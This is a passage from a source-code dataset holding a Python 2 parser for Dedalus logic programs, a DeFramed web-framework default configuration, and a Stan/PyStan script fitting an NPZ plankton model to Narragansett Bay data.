'notin' OR '', # subgoalTimeArg : <anInteger> }, ... ], # eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] }, # ... , # 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ] def parse( dedLine, settings_path ) : logging.debug( " PARSE : dedLine = '" + dedLine + "'" ) # ---------------------------------------------------- # # CASE : line is empty if dedLine == "" : return None # ---------------------------------------------------- # # CASE : line missing semicolon elif not ";" in dedLine : sys.exit( " PARSE : ERROR : missing semicolon in line '" + dedLine + "'" ) # ---------------------------------------------------- # # CASE : line is an include elif dedLine.startswith( 'include"' ) or dedLine.startswith( "include'" ) : pass # ---------------------------------------------------- # # CASE : line is a FACT elif not ":-" in dedLine : if not sanityCheckSyntax_fact_preChecks( dedLine ) : sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" ) factData = {} # ///////////////////////////////// # # get relation name relationName = dedLine.split( "(", 1 )[0] # ///////////////////////////////// # # get data list dataList = dedLine.split( "(", 1 )[1] # string dataList = dataList.split( ")", 1 )[0] # string dataList = dataList.split( "," ) # ///////////////////////////////// # # get time arg ampersandIndex = dedLine.index( "@" ) factTimeArg = dedLine[ ampersandIndex + 1 : ] factTimeArg = factTimeArg.replace( ";", "" ) # remove semicolons # ///////////////////////////////// # # save fact information factData[ "relationName" ] = relationName factData[ "dataList" ] = dataList factData[ "factTimeArg" ] = factTimeArg if not sanityCheckSyntax_fact_postChecks( dedLine, factData ) : sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" ) logging.debug( " PARSE : returning " + str( [ "fact", factData ] ) ) return [ "fact", factData ] # ---------------------------------------------------- # # CASE : line is a RULE # # rule returns : [ 'rule', # { relationName : 'relationNameStr', # goalAttList:[ data1, ... , dataN ], # goalTimeArg : ""/next/async, # subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr', # subgoalAttList : [ data1, ... , dataN ], # polarity : 'notin' OR '', # subgoalTimeArg : <anInteger> }, ... ], # eqnDict : { 'eqn1':{ variableList : [ 'var1', ... , 'varI' ] }, # ... , # 'eqnM':{ variableList : [ 'var1', ... , 'varJ' ] } } } ] elif ":-" in dedLine : if not sanityCheckSyntax_rule_preChecks( dedLine ) : sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" ) ruleData = {} # ///////////////////////////////// # # get relation name relationName = dedLine.split( "(", 1 )[0] ruleData[ "relationName" ] = relationName # ///////////////////////////////// # # get goal attribute list goalAttList = dedLine.split( "(", 1 )[1] # string goalAttList = goalAttList.split( ")", 1 )[0] # string goalAttList = goalAttList.split( "," ) ruleData[ "goalAttList" ] = goalAttList # ///////////////////////////////// # # get goal time argument goalTimeArg = dedLine.split( ":-", 1 )[0] # string try : goalTimeArg = goalTimeArg.split( "@", 1 )[1] # string except IndexError : goalTimeArg = "" ruleData[ "goalTimeArg" ] = goalTimeArg # ///////////////////////////////// # # parse the rule body for the eqn list eqnDict = getEqnDict( dedLine ) ruleData[ "eqnDict" ] = eqnDict # ///////////////////////////////// # # parse the rule body for the eqn list subgoalListOfDicts = getSubgoalList( dedLine, eqnDict ) ruleData[ "subgoalListOfDicts" ] = subgoalListOfDicts logging.debug( " PARSE : relationName = " + str( relationName ) ) logging.debug( " PARSE : goalAttList = " + str( goalAttList ) ) logging.debug( " PARSE : goalTimeArg = " + str( goalTimeArg ) ) logging.debug( " PARSE : subgoalListOfDicts = " + str( subgoalListOfDicts ) ) logging.debug( " PARSE : eqnDict = " + str( eqnDict ) ) if not sanityCheckSyntax_rule_postChecks( dedLine, ruleData, settings_path ) : sys.exit( " PARSE : ERROR : invalid syntax in fact '" + dedLine + "'" ) logging.debug( " PARSE : returning " + str( [ "rule", ruleData ] ) ) return [ "rule", ruleData ] # ---------------------------------------------------- # # CASE : wtf??? else : sys.exit( " PARSE : ERROR : this line is not an empty, a fact, or a rule : '" + dedLine + "'. aborting..." ) ########################## # CONTAINS NO SUBGOALS # ########################## # make cursory checks to determine if the input rule line contains subgoals def containsNoSubgoals( dedLine ) : body = getBody( dedLine ) # ------------------------------------- # # CASE : no open parenthesis to demark # attribute list start if "(" in body : return False # ------------------------------------- # # CASE : no closed parenthesis to demark # attribute list end elif ")" in body : return False # ------------------------------------- # # CASE : no commas to delimit subgoals elif "," in body : return False # ------------------------------------- # # otherwise, probably incorrect else : return True ############# # HAS AGG # ############# # check if the input attribute contains one # of the supported aggregate operations. def hasAgg( attStr ) : flag = False for agg in aggOps : if agg+"<" in attStr : flag = True return flag ################## # IS FIXED STR # ################## # check if the input attribute is a string, # as indicated by single or double quotes def isFixedStr( att ) : if att.startswith( "'" ) and att.startswith( "'" ) : return True elif att.startswith( '"' ) and att.startswith( '"' ) : return True else : return False ################## # IS FIXED INT # ################## # check if input attribute is an integer def isFixedInt( att ) : if att.isdigit() : return True else : return False ########################################### # CHECK MIN ONE POS SUBGOAL NO TIME ARG # ########################################### # make sure at least one positive subgoal # has no numeric time argument def check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) : if not hasPosSubgoalWithoutIntegerTimeArg( ruleData ) : raise Exception( " SANITY CHECK SYNTAX RULE POST CHECKS : ERROR : " + \ " invalid syntax in line \n'" + ruleLine + \ "'\n line at least one positive subgoal " + \ "must not be annotated with a numeric time argument." ) ################################ # CHECK IDENTICAL FIRST ATTS # ################################ # make sure all subgoals # have identical first attributes def check_identical_first_atts( ruleLine, ruleData ) : subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ] firstAtts = [] for sub in subgoalListOfDicts : subgoalAttList = sub[ "subgoalAttList" ] firstAtts.append( subgoalAttList[0] ) firstAtts = set( firstAtts ) if not len( firstAtts ) < 2 : raise Exception( " SANITY CHECK SYNTAX RULE : ERROR : " + \ "invalid syntax in line \n'" + ruleLine + \ "'\n all subgoals in next and async " + \ "rules must have identical first attributes.\n" ) ########################################## # SANITY CHECK SYNTAX RULE POST CHECKS # ########################################## # make sure contents of rule make sense. def sanityCheckSyntax_rule_postChecks( ruleLine, ruleData, settings_path ) : # ------------------------------------------ # # make sure all subgoals in next and async # rules have identical first attributes try : use_hacks = tools.getConfig( settings_path, "DEFAULT", "USE_HACKS", bool ) if use_hacks : if ruleData[ "goalTimeArg" ] == "next" : check_identical_first_atts( ruleLine, ruleData ) else : check_min_one_pos_subgoal_no_time_arg( ruleData ) if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" : check_identical_first_atts( ruleLine, ruleData ) except ConfigParser.NoOptionError : logging.warning( "WARNING : no 'USE_HACKS' defined in 'DEFAULT' section of settings.ini ...running without wildcard rewrites." ) check_min_one_pos_subgoal_no_time_arg( ruleLine, ruleData ) if ruleData[ "goalTimeArg" ] == "next" or ruleData[ "goalTimeArg" ] == "async" : check_identical_first_atts( ruleLine, ruleData ) # ------------------------------------------ # # make sure all goal and subgoal attribute # variables start with a captial letter goalAttList = ruleData[ "goalAttList" ] for att in goalAttList : if not att[0].isalpha() or not att[0].isupper() : if not hasAgg( att ) : # att is not an aggregate call if not isFixedStr( att ) : # att is not a fixed data input if not isFixedInt( att ) : # att is not a fixed data input sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n the goal contains contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." ) subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ] for sub in subgoalListOfDicts : subgoalAttList = sub[ "subgoalAttList" ] for att in subgoalAttList : if not att[0].isalpha() or not att[0].isupper() : if not hasAgg( att ) : # att is not an aggregate call if not isFixedStr( att ) : # att is not a fixed data input if not isFixedInt( att ) : # att is not a fixed data input # subgoals can have wildcards if not att[0] == "_" : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n subgoal '" + sub[ "subgoalName" ] + "' contains an attribute not starting with a capitalized letter: '" + att + "'. \n attribute variables must start with an upper case letter." ) # ------------------------------------------ # # make sure all relation names are # lower case goalName = ruleData[ "relationName" ] for c in goalName : if c.isalpha() and not c.islower() : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The goal name '" + goalName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." ) subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ] for sub in subgoalListOfDicts : subName = sub[ "subgoalName" ] for c in subName : if c.isalpha() and not c.islower() : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n The subgoal name '" + subName + "' contains an upper-case letter. \n relation names must contain only lower-case characters." ) return True ############################################## # HAS POS SUBGOAL WITHOUT INTEGER TIME ARG # ############################################## # check make sure the line contains at least # one positive subgoal NOT annotated with an # integer time argument def hasPosSubgoalWithoutIntegerTimeArg( ruleData ) : goalTimeArg = ruleData[ "goalTimeArg" ] subgoalListOfDicts = ruleData[ "subgoalListOfDicts" ] # ------------------------------------------ # # CASE : rule is either next or async # the clock goal is always initially positive if not goalTimeArg == "" : return True # ------------------------------------------ # # CASE : rule is deductive # need to check more closely for deductive rules else : for subgoal in subgoalListOfDicts : if subgoal[ "polarity"] == "" : # positive if not subgoal[ "subgoalTimeArg" ].isdigit() : return True return False ######################################### # SANITY CHECK SYNTAX RULE PRE CHECKS # ######################################### # make an initial pass on the rule syntax def sanityCheckSyntax_rule_preChecks( ruleLine ) : # make sure the line likely has subgoal(s) if containsNoSubgoals( ruleLine ) : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains no detected subgoals." ) # make sure parentheses make sense if not ruleLine.count( "(" ) == ruleLine.count( ")" ) : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent counts for '(' and ')'" ) # make sure number of single is even if not ruleLine.count( "'" ) % 2 == 0 : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." ) # make sure number of double quotes is even if not ruleLine.count( '"' ) % 2 == 0 : sys.exit( " SANITY CHECK SYNTAX RULE : ERROR : invalid syntax in line '" + ruleLine + "'\n rule contains inconsistent use of single quotes." ) return True ################## # GET EQN DICT # ################## # get the complete dictionary of equations in the given rule line def getEqnDict( dedLine ) : eqnDict = {} body = getBody( dedLine ) body = body.split( "," ) # get the complete list of eqns from the rule body eqnList = [] for thing in body : if isEqn( thing ) : eqnList.append( thing ) # get the complete list of variables per eqn for eqn in eqnList : varList = getEqnVarList( eqn ) eqnDict[ eqn ] = varList return eqnDict ###################### # GET EQN VAR LIST # ###################### def getEqnVarList( eqnString ) : for op in opList : eqnString = eqnString.replace( op, "___COMMA___" ) varList = eqnString.split( "___COMMA___" ) return varList ###################### # GET SUBGOAL LIST # ###################### # get the complete list of subgoals in the given rule line # subgoalListOfDicts : [ { subgoalName : 'subgoalNameStr', # subgoalAttList : [ data1, ... , dataN ], # polarity : 'notin' OR '', # subgoalTimeArg : <anInteger> }, ... ] def getSubgoalList( dedLine, eqnList ) : subgoalListOfDicts = [] # ========================================= # # replace eqn instances in line for eqn in eqnList : dedLine = dedLine.replace( eqn, "" ) dedLine = dedLine.replace( ",,", "," ) # ========================================= # # grab subgoals # grab indexes of commas separating subgoals indexList = getCommaIndexes( getBody( dedLine ) ) #print indexList # replace all subgoal-separating commas with a special character sequence body = getBody( dedLine ) tmp_body = "" for i in range( 0, len( body ) ) : if not i in indexList : tmp_body += body[i] else : tmp_body += "___SPLIT___HERE___" body = tmp_body #print body # generate list of separated subgoals by splitting on the special # character sequence subgoals = body.split( "___SPLIT___HERE___" ) # remove empties tmp_subgoals = [] for sub in subgoals : if not sub == "" : tmp_subgoals.append( sub ) subgoals = tmp_subgoals # ========================================= # # parse all subgoals in the list for sub in subgoals : #print sub currSubData = {} if not sub == "" : # get subgoalTimeArg try : ampersandIndex = sub.index( "@" ) subgoalTimeArg = sub[ ampersandIndex + 1 : ] sub = sub.replace( "@" + subgoalTimeArg, "" ) # remove the time arg from the subgoal except ValueError : subgoalTimeArg = "" # get subgoal name and polarity data = sub.replace( ")", "" ) data = data.split( "(" ) subgoalName = data[0] subgoalName = subgoalName.replace( ",", "" ) # remove any rogue commas if " notin " in subgoalName : polarity = "notin" subgoalName = subgoalName.replace( " notin ", "" ) else : polarity = "" # get subgoal att list subgoalAttList = data[1] subgoalAttList = subgoalAttList.split( "," ) # collect subgoal data currSubData[ "subgoalName" ] = subgoalName currSubData[ "subgoalAttList" ] = subgoalAttList currSubData[ "polarity" ] = polarity currSubData[ "subgoalTimeArg" ] = subgoalTimeArg # save data for this subgoal subgoalListOfDicts.append( currSubData ) #print subgoalListOfDict #sys.exit( "foo" ) return subgoalListOfDicts ####################### # GET COMMA INDEXES # ####################### # given a rule body, get the indexes of commas separating subgoals. def getCommaIndexes( body ) : underscoreStr = getCommaIndexes_helper( body ) indexList = [] for i in range( 0, len( underscoreStr ) ) : if underscoreStr[i] == "," : indexList.append( i ) return indexList ############################## # GET COMMA INDEXES HELPER # ############################## # replace all paren contents with underscores def getCommaIndexes_helper( body ) : # get the first occuring paren group nextParenGroup = "(" + re.search(r'\((.*?)\)',body).group(1) + ")" # replace the group with the same number of underscores in the body replacementStr = "" for i in range( 0, len(nextParenGroup)-2 ) : replacementStr += "_" replacementStr = "_" + replacementStr + "_" # use underscores to replace parentheses body = body.replace( nextParenGroup, replacementStr ) # BASE CASE : no more parentheses if not "(" in body : return body # RECURSIVE CASE : yes more parentheses else : return getCommaIndexes_helper( body ) ############ # IS EQN # ############ # check if input contents from the rule body is an equation def isEqn( sub ) : flag = False for op in eqnOps : if op in sub : flag = True return flag ############## # GET BODY # ############## # return the body str from the input rule def getBody( query ) : body = query.replace( "notin", "___NOTIN___" ) body = body.replace( ";", "" ) body = body.translate( None, string.whitespace ) body = body.split( ":-" ) body = body[1] body = body.replace( "___NOTIN___", " notin " ) return body ############################## # SANITY CHECK SYNTAX FACT # ############################## # check fact lines for invalud syntax. # abort if invalid syntax found. # return True otherwise. def sanityCheckSyntax_fact_preChecks( factLine ) : logging.debug( " SANITY CHECK SYNTAX FACT : running process..." ) logging.debug( " SANITY CHECK SYNTAX FACT : factLine = " + str( factLine ) ) # ------------------------------------------ # # facts must have time args. if not "@" in factLine : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line does not contain a time argument.\n" ) # ------------------------------------------ # # check parentheses if not factLine.count( "(" ) < 2 : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one '('\n" ) elif not factLine.count( "(" ) > 0 : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one '('\n" ) if not factLine.count( ")" ) < 2 : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains more than one ')'\n" ) elif not factLine.count( ")" ) > 0 : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in line '" + factLine + "'\n line contains fewer than one ')'\n" ) return True ########################################## # SANITY CHECK SYNTAX FACT POST CHECKS # ########################################## # check fact lines for invalud syntax. # abort if invalid syntax found. # return True otherwise. def sanityCheckSyntax_fact_postChecks( factLine, factData ) : logging.debug( " SANITY CHECK SYNTAX FACT : running process..." ) logging.debug( " SANITY CHECK SYNTAX FACT : factData = " + str( factData ) ) # ------------------------------------------ # # check quotes on input string data dataList = factData[ "dataList" ] for data in dataList : logging.debug( " SANITY CHECK SYNTAX FACT : data = " + str( data ) + ", type( data ) = " + str( type( data) ) + "\n" ) if isString( data ) : # check quotes if not data.count( "'" ) == 2 and not data.count( '"' ) == 2 : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid syntax in fact '" + \ str( factLine ) + "'\n fact definition contains string data not " + \ "surrounded by either exactly two single quotes or exactly two double quotes : " + data + "\n" ) else : pass # ------------------------------------------ # # check time arg factTimeArg = factData[ "factTimeArg" ] print "factTimeArg = " + str( factTimeArg ) if not factTimeArg.isdigit() and \ not factTimeArg == "constant" : sys.exit( " SANITY CHECK SYNTAX FACT : ERROR : invalid " + \ "syntax in fact data list '" + str( factLine ) + \ "'\n fact definition has no valid time arg." ) return True ############### # IS STRING # ############### # test if the input string contains any alphabetic characters. # if so, then the data is a string. def isString( testString ) : logging.debug( " IS STRING : testString = " + str( testString ) ) alphabet = [ 'a', 'b', 'c', \ 'd', 'e', 'f', \ 'g', 'h', 'i', \ 'j', 'k', 'l', \ 'm', 'n', 'o', \ 'p', 'q', 'r', \ 's', 't', 'u', \ 'v', 'w', 'x', \ 'y', 'z' ] flag = False for character in testString : if character.lower() in alphabet : flag = True logging.debug( " IS STRING : flag = " + str( flag ) ) return flag ################### # PARSE DEDALUS # ################### # input name of raw dedalus file # output array of arrays containing the contents of parsed ded lines def parseDedalus( dedFile, settings_path ) : logging.debug( " PARSE DEDALUS : dedFile = " + dedFile ) parsedLines = [] # ------------------------------------------------------------- # # remove all multiline whitespace and place all rules # on individual lines lineList = sanitizeFile( dedFile ) # ------------------------------------------------------------- # # iterate over each line and parse for line in lineList : result = parse( line, settings_path ) # parse returns None on empty lines if result : parsedLines.append( result ) logging.debug( " PARSE DEDALUS : parsedLines = " + str( parsedLines ) ) return parsedLines # ------------------------------------------------------------- # ################### # SANITIZE FILE # ################### # input all lines from input file # combine all lines into a single huge string. # to preserve syntax : # replace semicolons with string ';___NEWLINE___' # replace all notins with '___notin___' # split on '___NEWLINE__' def sanitizeFile( dedFile ) : bigLine = "" # "always check if files exist" -- Ye Olde SE proverb if os.path.isfile( dedFile ) : f = open( dedFile, "r" ) # combine all lines into one big line for line in f : #print "old_line = " +str( line ) line = line.replace( "//", "___THISISACOMMENT___" ) line = line.split( "___THISISACOMMENT___", 1 )[0] #print "new_line = " +str( line ) line = line.replace( "notin", "___notin___" ) # preserve notins line = line.replace( ";", ";___NEWLINE___" ) # preserve semicolons line = line.translate( None, string.whitespace ) # remove all whitespace bigLine += line f.close() bigLine = bigLine.replace( "___notin___", " notin " ) # restore notins lineList = bigLine.split( "___NEWLINE___" ) # split big line into a list of lines # remove duplicates final_lineList = [] for line in lineList : if not line in final_lineList : final_lineList.append( line ) return final_lineList else : sys.exit( "ERROR: File at " + dedFile + " does not exist.\nAborting..." ) ######### # EOF # #########
adec15e7f10d62c6d1a6c1bca83ce174883b2551
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
/deframed/default.py
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
[]
no_license
smurfix/deframed
f1c4611c597809b53a138b70665430ed080a989d
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
refs/heads/master
2022-07-20T14:08:35.938667
2022-07-14T07:05:43
2022-07-14T07:05:43
259,882,446
24
1
null
null
null
null
UTF-8
Python
false
false
2,184
py
""" This module contains the default values for configuring DeFramed. """ from .util import attrdict __all__ = ["CFG"] CFG = attrdict( logging=attrdict( # a magic incantation version=1, loggers=attrdict( #"asyncari": {"level":"INFO"}, ), root=attrdict( handlers= ["stderr",], level="INFO", ), handlers=attrdict( logfile={ "class":"logging.FileHandler", "filename":"/var/log/deframed.log", "level":"INFO", "formatter":"std", }, stderr={ "class":"logging.StreamHandler", "level":"INFO", "formatter":"std", "stream":"ext://sys.stderr", }, ), formatters=attrdict( std={ "class":"deframed.util.TimeOnlyFormatter", "format":'%(asctime)s %(levelname)s:%(name)s:%(message)s', }, ), disable_existing_loggers=False, ), server=attrdict( # used to setup the hypercorn toy server host="127.0.0.1", port=8080, prio=0, name="test me", use_reloader=False, ca_certs=None, certfile=None, keyfile=None, ), mainpage="templates/layout.mustache", debug=False, data=attrdict( # passed to main template title="Test page. Do not test!", loc=attrdict( #msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js", #mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js", msgpack="https://unpkg.com/@msgpack/msgpack", mustache="/static/ext/mustache.min.js", bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css", bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js", poppler="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js", jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js", ), static="static", # path ), )
fc140be5ed838830be722cb050742cde1b3cb053
87455bab2ddf7c9312453ca74689b133f3d6745d
/case_studies/npz/scripts/npz_narragansett_py.py
879eba3573907047de566834166742228e1a45bb
[]
no_license
maxEntropyProd/bayesian_cbiomes
dd87d7f88e127e5f0699d15ae0ec3f2380b9ba89
c3a2f2e60f2271a0a4843e9db6be2111b765efa1
refs/heads/master
2020-12-06T06:30:34.433777
2020-01-10T14:06:20
2020-01-10T14:06:20
232,373,541
0
0
null
2020-01-07T17:01:40
2020-01-07T17:01:39
null
UTF-8
Python
false
false
14,243
py
#!/usr/bin/env python # coding: utf-8 # # Confront the NPZ model with real data from Narrangansett Bay # # ## 1. A first look at the data # In[1]: import numpy as np # load data from CSV file datafile = 'data/data_npz_narragansett.csv' data = np.loadtxt(datafile, skiprows=1, delimiter=',') with open(datafile) as f: data_names = f.readline().strip().split(',') print(data_names) # In[14]: import matplotlib.pyplot as plt fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12)) for iax,ax in enumerate(axs.flat[:-1]): ax.plot(data[:,0], data[:,iax+1]) ax.set_ylabel(data_names[iax+1]) ax.grid(True) axs[0].set_title('Narragansett Bay NPZ data') axs[0].axhline(0.25, color='darkred') axs[-1].plot(data[:,0], np.sum(data[:,1:],axis=1)) axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,data[-1,0],365.0)) axs[-1].grid(True) # ### challenges for fitting data: # * high noise level # * no conservation of mass while NPZ model conserves mass # ## 2. Modifications to the NPZ model # # allow influx and loss of N in the model: # * introduce a background concentration for each variable and allow mixing with that background concentration # * have a winter period for each year with stronger mixing and different background concentrations # * estimate start and duration of winter period for each year (initial guess is based on data) # * estimate background concentrations for winter and regular period (same for each year) # # # In[3]: # base initial guess of start and duration of the winter period based on N crossing a 0.25 threshold stan_code_dataparams = '''data { int<lower=0> nobs; // number of timesteps with observations real<lower=0> tobs[nobs]; // obs times int<lower=0> nobsvar; // number of observed variables int<lower=0> iobsvar[nobsvar]; // index of observed variable (N=1, P=2, Z=3) real<lower=0> obs[nobs,nobsvar]; // observed variable at measurement times int<lower=0> nyears; // number of years (number of winters to add to the model) } transformed data { real wintermixstart_guess[nyears]; real wintermixduration_guess[nyears]; { int start = 0; int iyear = 1; real thresh = 0.25; for (it in 1:nobs){ if (start == 0 && obs[it,1] >= thresh){ start = 1; wintermixstart_guess[iyear] = tobs[it]; } else if (start == 1 && obs[it,1] < thresh && obs[it+1,1] < thresh){ start = 0; wintermixduration_guess[iyear] = tobs[it] - wintermixstart_guess[iyear]; wintermixstart_guess[iyear] -= 365.0*(iyear-1); iyear += 1; if (iyear > nyears){ break; } } } } // will be printed once by every chain print("wintermixstart_guess = ",wintermixstart_guess); print("wintermixduration_guess = ",wintermixduration_guess); } parameters { real<lower=0> vmax; // maximum growth rate in Michaelis Menten formulation real<lower=0> nuthalfsat; // nutrient half saturation in Michaelis Menten formulation real<lower=0> graz; // zooplankton grazing rate real<lower=0> mort_p; // phytoplankton mortality rate real<lower=0> mort_z; // zooplankton mortality rate real<lower=0> bgconc_n1; // N background concentration regular real<lower=0> bgconc_n2; // N background concentration winter real<lower=0> bgconc_p1; // P background concentration regular real<lower=0> bgconc_p2; // P background concentration winter real<lower=0> bgconc_z1; // Z background concentration regular real<lower=0> bgconc_z2; // Z background concentration winter real<lower=0> mix1; // mixing strength regular real<lower=0> mix2; // mixing strength winter real<lower=-100.0,upper=200.0> wintermixstart[nyears]; // start of winter mixing, restricted to broad winter period real<lower=0> wintermixduration[nyears]; // duration of winter mixing real<lower=1E-15> sigma[nobsvar]; // observation error standard deviations real<lower=0> x0[3]; // initial conditions } transformed parameters { real theta[13+2*nyears]; real x[nobs,3]; theta[1] = vmax; theta[2] = nuthalfsat; theta[3] = graz; theta[4] = mort_p; theta[5] = mort_z; theta[6] = bgconc_n1; theta[7] = bgconc_n2; theta[8] = bgconc_p1; theta[9] = bgconc_p2; theta[10] = bgconc_z1; theta[11] = bgconc_z2; theta[12] = mix1; theta[13] = mix2; for (iyear in 1:nyears){ theta[13+2*iyear-1] = wintermixstart[iyear] + (iyear-1)*365.0; theta[13+2*iyear] = theta[13+2*iyear-1] + wintermixduration[iyear]; } x = integrate_ode_rk45(npz, x0, -1, tobs, theta, rep_array(0.0, 0), rep_array(0, 0), 1e-5, 1e-4, 2e3*nyears); } ''' # In[4]: # for now, do not fit data stan_code_model_nofit = '''model { x0[1] ~ normal(0.3, 0.1); // prior on N initial conditions x0[2] ~ normal(0.1, 0.1); // prior on P initial conditions x0[3] ~ normal(0.1, 0.1); // prior on Z initial conditions sigma ~ exponential(1.0); // priors for parameters vmax ~ normal(0.15, 0.03); nuthalfsat ~ normal(0.17, 0.04); graz ~ normal(0.15, 0.04); mort_p ~ normal(0.02, 0.01); mort_z ~ normal(0.02, 0.005); bgconc_n1 ~ normal(0.01, 0.001); // (regular) bgconc_n2 ~ normal(0.66, 0.08); // (winter) bgconc_p1 ~ normal(0.11, 0.01); // (regular) bgconc_p2 ~ normal(0.05, 0.005); // (winter) bgconc_z1 ~ normal(0.09, 0.01); // (regular) bgconc_z2 ~ normal(0.05, 0.03); // (winter) mix1 ~ normal(0.01, 0.03); // (regular) mix2 ~ normal(0.19, 0.02); // (winter) for (iyear in 1:nyears){ wintermixstart[iyear] ~ normal(wintermixstart_guess[iyear], 10.0); wintermixduration[iyear] ~ normal(wintermixduration_guess[iyear], 10.0); } // no fitting of data yet } ''' # In[5]: # mixing/exchange with background concentrations is implemented using a nudging/relaxation term stan_code_functions = '''functions { real[] npz(real t, // time real[] x, // state real[] theta, // parameters real[] x_r, // real-valued input data (empty) int[] x_i) { // integer-valued input data (empty) /* guide to theta: theta[1]: vmax maximum growth rate in Michaelis Menten formulation theta[2]: nuthalfsat nutrient half saturation in Michaelis Menten formulation theta[3]: graz zooplankton grazing rate theta[4]: mort_p phytoplankton mortality rate theta[5]: mort_z zooplankton mortality rate theta[6]: bgconc_n1 N background concentration regular theta[7]: bgconc_n2 N background concentration winter theta[8]: bgconc_p1 P background concentration regular theta[9]: bgconc_p2 P background concentration winter theta[10]: bgconc_z1 Z background concentration regular theta[11]: bgconc_z2 Z background concentration winter theta[12]: mix1 mixing strength regular theta[13]: mix2 mixing strength winter theta[14]: start time of first winter theta[15]: stop time of first winter theta[16]: start time of second winter theta[17]: stop time of second winter ... number of winters is set to nyears */ real n = fmax(0.0, x[1]); real p = fmax(0.0, x[2]); real z = fmax(0.0, x[3]); real growth = theta[1]*n/(theta[2]+n) * p; // nutrient-dependent growth real grazing = theta[3]*p*z; // grazing real ploss = theta[4]*p; // linear phytoplankton mortality real zloss = theta[5]*z*z; // quadratic zooplankton mortality // N,P,Z gain or loss terms due to mixing/exchange with background real exch_n; real exch_p; real exch_z; int i = 14; while (i <= size(theta) && t>=theta[i]){ i += 1; } if ((i-13)%2 == 1){ // regular (non-winter) time exch_n = theta[12]*(theta[6]-n); exch_p = theta[12]*(theta[8]-p); exch_z = theta[12]*(theta[10]-z); } else { // winter time exch_n = theta[13]*(theta[7]-n); exch_p = theta[13]*(theta[9]-p); exch_z = theta[13]*(theta[11]-z); } return {-growth+ploss+zloss+exch_n,growth-grazing-ploss+exch_p,grazing-zloss+exch_z}; } } ''' # ## 3. Sampling from the prior # # Because we are not yet fitting data in the model, the Stan output are samples from the prior model solution. # In[6]: import pystan # stitch together the code and compile it stan_code = stan_code_functions + stan_code_dataparams + stan_code_model_nofit model = pystan.StanModel(model_code=stan_code, model_name='NPZ') # In[7]: # reduce the dataset (to decrease runtime) nyears = 2 index = data[:,0] <= nyears * 365 stan_data = { 'nobs':sum(index), 'tobs':data[index,0], 'nobsvar':3, 'iobsvar':(1,2,3), # all variables are observed 'obs':data[index,1:], 'nyears':nyears, } # In[8]: # run the model, note low number of iterations/length of chain mcmc = model.sampling(data=stan_data, iter=1000) print(mcmc) # In[9]: # plot 100 randomly chosen prior solutions index_prior = np.random.choice(mcmc['x'].shape[0], 100, replace=False) t = data[index,0] fig, axs = plt.subplots(nrows=4, sharex=True, sharey=True, figsize=(12,12)) for iax,ax in enumerate(axs.flat[:-1]): ax.plot(t, data[index,iax+1]) ax.plot(t, mcmc['x'][index_prior,:,iax].T, color='k', alpha=0.1) ax.set_ylabel(data_names[iax+1]) ax.grid(True) axs[0].set_title('Narragansett Bay NPZ data and samples from the model prior') axs[-1].plot(t, np.sum(data[index,1:],axis=1)) axs[-1].plot(t, np.sum(mcmc['x'][index_prior,:,:],axis=2).T, color='k', alpha=0.1) axs[-1].set(xlabel=data_names[0], ylabel='sum', xticks=np.arange(0.0,nyears*365.0,365.0)) axs[-1].grid(True) None # ## 4. Reparameterizing the model and fitting data # # Normally we would use a statement like # ``` # for(i in 1:nobsvar){ # for (iobs in 1:nobs){ # obs[iobs,i] ~ normal(x[iobs,iobsvar[i]], sigma[i]); # } # } # ``` # in Stan's model block to fit the data. When formulated this way, Stan can have trouble sampling from the posterior distribution, for example when `sigma[i]` changes greatly for different values of `x[iobs,iobsvar[i]]`. # # Here it helps *a lot* (decrease in runtime by 1-2 orders of magnitude) to reparameterize the model: # ``` # for(i in 1:nobsvar){ # for (iobs in 1:nobs){ # obs_normalized = (obs[iobs,i]-x[iobs,iobsvar[i]])/sigma[i]; # obs_normalized ~ std_normal(); # } # } # ``` 